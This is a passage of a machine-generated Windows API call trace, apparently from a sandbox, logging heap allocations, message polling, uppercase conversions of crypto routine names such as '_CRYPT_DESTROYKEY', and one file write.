dwFlags=0x0, lpMem=0x2e51a48 | out: hHeap=0x970000) returned 1 [0263.499] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55098 | out: hHeap=0x970000) returned 1 [0263.499] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51b38 | out: hHeap=0x970000) returned 1 [0263.499] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e550b8 [0263.499] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x13250) returned 0xe764f8 [0263.500] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0xe632a0 | out: hHeap=0x970000) returned 1 [0263.500] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f48 | out: hHeap=0x970000) returned 1 [0263.500] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0263.500] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e550c8 [0263.501] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550c8 | out: hHeap=0x970000) returned 1 [0263.501] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e77a88 | out: hHeap=0x970000) returned 1 [0263.501] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0263.501] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55048 [0263.501] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55098 [0263.501] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e69b08 [0263.501] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69b08 | out: hHeap=0x970000) returned 1 [0263.501] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55098 | out: hHeap=0x970000) returned 1 [0263.501] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55048 | out: hHeap=0x970000) returned 1 [0263.501] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0263.501] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54080 [0263.501] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55058 [0263.501] CharUpperBuffW (in: lpsz="_CRYPT_SHUTDOWN", cchLength=0xf | out: lpsz="_CRYPT_SHUTDOWN") returned 0xf [0263.501] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54080 | out: hHeap=0x970000) returned 1 [0263.501] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55058 | out: hHeap=0x970000) returned 1 [0263.501] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e518e0 [0263.501] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x40) returned 0x2e78810 [0263.501] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0263.501] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x30) returned 0x2e55ca8 [0263.501] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54f28 [0263.501] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTDEC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTDEC") returned 0x13 [0263.501] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55ca8 | out: hHeap=0x970000) returned 1 [0263.501] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f28 | out: hHeap=0x970000) returned 1 [0263.501] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e51a48 [0263.501] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x40) returned 0x2e78b28 [0263.501] PeekMessageW (in: lpMsg=0x8ceef8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ceef8) returned 0 [0263.502] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e550c8 [0263.502] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54fb8 [0263.502] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54fb8 | out: hHeap=0x970000) returned 1 [0263.502] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55048 [0263.502] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e69a08 [0263.502] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69a08 | out: hHeap=0x970000) returned 1 [0263.502] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55048 | out: hHeap=0x970000) returned 1 [0263.502] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550c8 | out: hHeap=0x970000) returned 1 [0263.502] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51b08 [0263.502] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e51b20 [0263.502] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51b38 [0263.502] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e51b50 [0263.502] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e51b68 [0263.502] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e51b98 [0263.502] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e543a0 [0263.502] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51b08 | out: hHeap=0x970000) returned 1 [0263.502] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e518c8 [0263.502] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e51a78 [0263.502] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e51940 [0263.502] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55098 [0263.502] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55098 | out: hHeap=0x970000) returned 1 [0263.502] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55018 [0263.502] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55018 | out: hHeap=0x970000) returned 1 [0263.502] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51b38 | out: hHeap=0x970000) returned 1 [0263.502] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51b20 | out: hHeap=0x970000) returned 1 [0263.502] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51b50 | out: hHeap=0x970000) returned 1 [0263.503] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51b68 | out: hHeap=0x970000) returned 1 [0263.503] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51b98 | out: hHeap=0x970000) returned 1 [0263.503] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e518c8 | out: hHeap=0x970000) returned 1 [0263.503] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51a78 | out: hHeap=0x970000) returned 1 [0263.503] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51940 | out: hHeap=0x970000) returned 1 [0263.503] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e543a0 | out: hHeap=0x970000) returned 1 [0263.503] PeekMessageW (in: lpMsg=0x8ceef8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ceef8) returned 0 [0263.503] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e78b28 | out: hHeap=0x970000) returned 1 [0263.503] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51a48 | out: hHeap=0x970000) returned 1 [0263.503] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0263.503] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55038 [0263.503] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x30) returned 0x2e55ca8 [0263.503] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54f48 [0263.503] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0263.503] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55ca8 | out: hHeap=0x970000) returned 1 [0263.503] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f48 | out: hHeap=0x970000) returned 1 [0263.503] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e51988 [0263.503] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x40) returned 0x2e78858 [0263.503] PeekMessageW (in: lpMsg=0x8ced58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ced58) returned 0 [0263.503] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54f18 [0263.503] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55048 [0263.503] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55048 | out: hHeap=0x970000) returned 1 [0263.503] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f18 | out: hHeap=0x970000) returned 1 [0263.503] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e78858 | out: hHeap=0x970000) returned 1 [0263.503] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51988 | out: hHeap=0x970000) returned 1 [0263.503] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55048 [0263.503] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e69b68 [0263.504] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69b68 | out: hHeap=0x970000) returned 1 [0263.504] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55048 | out: hHeap=0x970000) returned 1 [0263.504] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55038 | out: hHeap=0x970000) returned 1 [0263.504] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x38) returned 0x2e77b08 [0263.504] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0263.504] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e77b08 | out: hHeap=0x970000) returned 1 [0263.504] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0263.504] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e78810 | out: hHeap=0x970000) returned 1 [0263.504] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e518e0 | out: hHeap=0x970000) returned 1 [0263.504] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0263.504] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55068 [0263.504] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51b08 [0263.504] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51988 [0263.504] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55008 [0263.504] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55008 | out: hHeap=0x970000) returned 1 [0263.504] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51b20 [0263.504] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e550c8 [0263.504] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550c8 | out: hHeap=0x970000) returned 1 [0263.504] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51b38 [0263.504] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e550c8 [0263.504] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55008 [0263.504] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x13250) returned 0xe632a0 [0263.505] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550c8 | out: hHeap=0x970000) returned 1 [0263.505] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54f78 [0263.505] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x13250) returned 0xe89750 [0263.506] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51988 | out: hHeap=0x970000) returned 1 [0263.506] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51b20 | out: hHeap=0x970000) returned 1 [0263.506] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0xe632a0 | out: hHeap=0x970000) returned 1 [0263.506] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55008 | out: hHeap=0x970000) returned 1 [0263.506] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51b38 | out: hHeap=0x970000) returned 1 [0263.506] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51b08 | out: hHeap=0x970000) returned 1 [0263.506] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55068 | out: hHeap=0x970000) returned 1 [0263.506] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55008 [0263.507] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x13250) returned 0xe632a0 [0263.507] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0xe89750 | out: hHeap=0x970000) returned 1 [0263.507] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f78 | out: hHeap=0x970000) returned 1 [0263.507] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54fb8 [0263.507] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x13250) returned 0xe89750 [0263.507] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0xe632a0 | out: hHeap=0x970000) returned 1 [0263.507] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55008 | out: hHeap=0x970000) returned 1 [0263.507] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e78a50 | out: hHeap=0x970000) returned 1 [0263.507] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51970 | out: hHeap=0x970000) returned 1 [0263.507] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51ad8 | out: hHeap=0x970000) returned 1 [0263.507] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f08 | out: hHeap=0x970000) returned 1 [0263.507] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e541e8 | out: hHeap=0x970000) returned 1 [0263.507] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51d18 | out: hHeap=0x970000) returned 1 [0263.507] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51d30 | out: hHeap=0x970000) returned 1 [0263.507] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51d48 | out: hHeap=0x970000) returned 1 [0263.507] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51da8 | out: hHeap=0x970000) returned 1 [0263.507] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51dc0 | out: hHeap=0x970000) returned 1 [0263.507] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51df0 | out: hHeap=0x970000) returned 1 [0263.507] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55028 | out: hHeap=0x970000) returned 1 [0263.507] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x9778d8 | out: hHeap=0x970000) returned 1 [0263.507] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69ba8 | out: hHeap=0x970000) returned 1 [0263.507] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51dd8 | out: hHeap=0x970000) returned 1 [0263.507] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51e08 | out: hHeap=0x970000) returned 1 [0263.507] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51fd0 | out: hHeap=0x970000) returned 1 [0263.507] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54350 | out: hHeap=0x970000) returned 1 [0263.508] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55108 | out: hHeap=0x970000) returned 1 [0263.508] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x3be0048 | out: hHeap=0x970000) returned 1 [0263.508] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51bb0 | out: hHeap=0x970000) returned 1 [0263.508] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51b80 | out: hHeap=0x970000) returned 1 [0263.508] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54fa8 | out: hHeap=0x970000) returned 1 [0263.508] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54558 | out: hHeap=0x970000) returned 1 [0263.508] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51a90 | out: hHeap=0x970000) returned 1 [0263.508] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51a18 | out: hHeap=0x970000) returned 1 [0263.508] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54da8 | out: hHeap=0x970000) returned 1 [0263.508] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e544e0 | out: hHeap=0x970000) returned 1 [0263.508] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e518f8 | out: hHeap=0x970000) returned 1 [0263.508] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f98 | out: hHeap=0x970000) returned 1 [0263.508] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x977cc8 | out: hHeap=0x970000) returned 1 [0263.508] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f88 | out: hHeap=0x970000) returned 1 [0263.508] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0xe50048 | out: hHeap=0x970000) returned 1 [0263.509] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69be8 | out: hHeap=0x970000) returned 1 [0263.509] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51aa8 | out: hHeap=0x970000) returned 1 [0263.509] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51ac0 | out: hHeap=0x970000) returned 1 [0263.509] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f58 | out: hHeap=0x970000) returned 1 [0263.509] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54328 | out: hHeap=0x970000) returned 1 [0263.510] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51a60 | out: hHeap=0x970000) returned 1 [0263.510] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54300 | out: hHeap=0x970000) returned 1 [0263.510] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550a8 | out: hHeap=0x970000) returned 1 [0263.510] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e542d8 | out: hHeap=0x970000) returned 1 [0263.510] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e519a0 | out: hHeap=0x970000) returned 1 [0263.510] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e542b0 | out: hHeap=0x970000) returned 1 [0263.510] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d88 | out: hHeap=0x970000) returned 1 [0263.510] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e544b8 | out: hHeap=0x970000) returned 1 [0263.510] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51a00 | out: hHeap=0x970000) returned 1 [0263.510] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51a30 | out: hHeap=0x970000) returned 1 [0263.510] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f68 | out: hHeap=0x970000) returned 1 [0263.510] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54238 | out: hHeap=0x970000) returned 1 [0263.510] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2f3a4c0 | out: hHeap=0x970000) returned 1 [0263.511] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e58 | out: hHeap=0x970000) returned 1 [0263.511] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51640 | out: hHeap=0x970000) returned 1 [0263.511] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51628 | out: hHeap=0x970000) returned 1 [0263.511] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e78 | out: hHeap=0x970000) returned 1 [0263.511] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e541c0 | out: hHeap=0x970000) returned 1 [0263.511] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0xe764f8 | out: hHeap=0x970000) returned 1 [0263.512] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550b8 | out: hHeap=0x970000) returned 1 [0263.512] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51928 | out: hHeap=0x970000) returned 1 [0263.512] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51af0 | out: hHeap=0x970000) returned 1 [0263.513] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ff8 | out: hHeap=0x970000) returned 1 [0263.513] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54508 | out: hHeap=0x970000) returned 1 [0263.513] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e515e0 | out: hHeap=0x970000) returned 1 [0263.513] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c18 | out: hHeap=0x970000) returned 1 [0263.513] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d48 | out: hHeap=0x970000) returned 1 [0263.513] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d18 | out: hHeap=0x970000) returned 1 [0263.513] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ee8 | out: hHeap=0x970000) returned 1 [0263.513] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51778 | out: hHeap=0x970000) returned 1 [0263.513] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2f14010 | out: hHeap=0x970000) returned 1 [0263.513] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d38 | out: hHeap=0x970000) returned 1 [0263.513] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51790 | out: hHeap=0x970000) returned 1 [0263.513] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e516d0 | out: hHeap=0x970000) returned 1 [0263.514] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e518b0 | out: hHeap=0x970000) returned 1 [0263.514] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e515c8 | out: hHeap=0x970000) returned 1 [0263.514] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51880 | out: hHeap=0x970000) returned 1 [0263.514] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54cf8 | out: hHeap=0x970000) returned 1 [0263.514] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2f27268 | out: hHeap=0x970000) returned 1 [0263.515] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54b88 | out: hHeap=0x970000) returned 1 [0263.515] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54cf8 [0263.515] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x13250) returned 0xe50048 [0263.518] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0xe89750 | out: hHeap=0x970000) returned 1 [0263.518] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54fb8 | out: hHeap=0x970000) returned 1 [0263.518] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0263.518] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ff8 [0263.518] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ff8 | out: hHeap=0x970000) returned 1 [0263.518] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x38) returned 0x2e77888 [0263.518] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0263.518] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e77888 | out: hHeap=0x970000) returned 1 [0263.518] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0263.518] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51790 [0263.518] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e516d0 [0263.518] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55078 [0263.521] WriteFile (in: hFile=0x2a0, lpBuffer=0x2f14010*, nNumberOfBytesToWrite=0x13250, lpNumberOfBytesWritten=0x8cf5e4, lpOverlapped=0x0 | out: lpBuffer=0x2f14010*, lpNumberOfBytesWritten=0x8cf5e4*=0x13250, lpOverlapped=0x0) returned 1 [0263.523] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0263.524] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54f68 [0263.524] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0263.524] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e550e8 [0263.524] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55088 [0263.524] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e698c8 [0263.524] CharUpperBuffW (in: lpsz="_CRYPT_DESTROYKEY", cchLength=0x11 | out: lpsz="_CRYPT_DESTROYKEY") returned 0x11 [0263.524] PeekMessageW (in: lpMsg=0x8cf3a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3a0) returned 0 [0263.524] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51a18 [0263.524] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, 